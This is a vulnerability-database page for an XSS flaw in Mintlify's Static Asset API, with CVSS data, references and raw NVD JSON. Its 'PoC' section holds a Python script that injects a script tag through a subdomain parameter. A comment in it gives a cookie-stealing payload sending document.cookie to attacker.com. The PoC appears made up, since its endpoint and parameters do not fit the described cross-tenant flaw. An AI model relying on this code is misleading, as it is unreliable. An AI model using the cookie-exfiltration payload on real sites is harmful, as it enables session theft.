CVE-2025-67842

Description

The Static Asset API in Mintlify Platform before 2025-11-15 allows remote attackers to inject arbitrary web script or HTML via the subdomain parameter because any tenant's assets can be served on any other tenant's documentation site.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mintlify:mintlify:*:*:*:*:*:*:*:* - VULNERABLE

Mintlify Platform < 2025-11-15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-67842 Mintlify XSS PoC
import requests
import urllib.parse

TARGET_URL = "https://api.mintlify.com/v1/static-asset"
MALICIOUS_SUBDOMAIN = "xss<script>alert(document.cookie)</script>.attacker.com"

def exploit_mintlify_xss(target_documentation_site):
    """
    Exploit Mintlify Platform XSS via subdomain parameter injection
    This PoC demonstrates how an attacker can inject malicious scripts
    through the Static Asset API's subdomain parameter.
    """
    # Step 1: Prepare malicious subdomain payload
    payload = {
        "subdomain": MALICIOUS_SUBDOMAIN,
        "path": "/",
        "tenant_id": "victim-tenant"
    }
    
    # Step 2: Send crafted request to Static Asset API
    response = requests.get(
        TARGET_URL,
        params=payload,
        headers={
            "User-Agent": "Mozilla/5.0",
            "Referer": target_documentation_site
        }
    )
    
    print(f"[*] Request sent to {TARGET_URL}")
    print(f"[*] Payload: {urllib.parse.urlencode(payload)}")
    print(f"[*] Response Status: {response.status_code}")
    
    # Step 3: The malicious asset is now served on victim's site
    # When users visit the victim's documentation, the XSS will execute
    
    return response

# Example attack scenario
VICTIM_SITE = "https://docs.victim-company.com"
exploit_mintlify_xss(VICTIM_SITE)

# After exploitation, visiting VICTIM_SITE will execute:
# alert(document.cookie)
# Attackers can replace this with cookie stealing:
# <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67842
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67842
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67842/
[4] VulDB https://vuldb.com/cve/CVE-2025-67842
[5] https://gist.github.com/hackermondev/5e2cdc32849405fff6b46957747a2d28
[6] https://heartbreak.ing
[7] https://kibty.town/blog/mintlify/
[8] https://news.ycombinator.com/item?id=46317098
[9] https://www.mintlify.com/blog/working-with-security-researchers-november-2025
[10] https://www.mintlify.com/docs/changelog
[11] https://kibty.town/blog/mintlify/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67842", "sourceIdentifier": "[email protected]", "published": "2025-12-19T02:16:08.813", "lastModified": "2026-01-02T16:01:50.773", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "The Static Asset API in Mintlify Platform before 2025-11-15 allows remote attackers to inject arbitrary web script or HTML via the subdomain parameter because any tenant's assets can be served on any other tenant's documentation site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-829"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mintlify:mintlify:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-11-15", "matchCriteriaId": "4E599124-4B00-4D5C-ADB5-EC4564D3E5BF"}]}]}], "references": [{"url": "https://gist.github.com/hackermondev/5e2cdc32849405fff6b46957747a2d28", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://heartbreak.ing", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://kibty.town/blog/mintlify/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://news.ycombinator.com/item?id=46317098", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://www.mintlify.com/blog/working-with-security-researchers-november-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mintlify.com/docs/changelog", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://kibty.town/blog/mintlify/", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}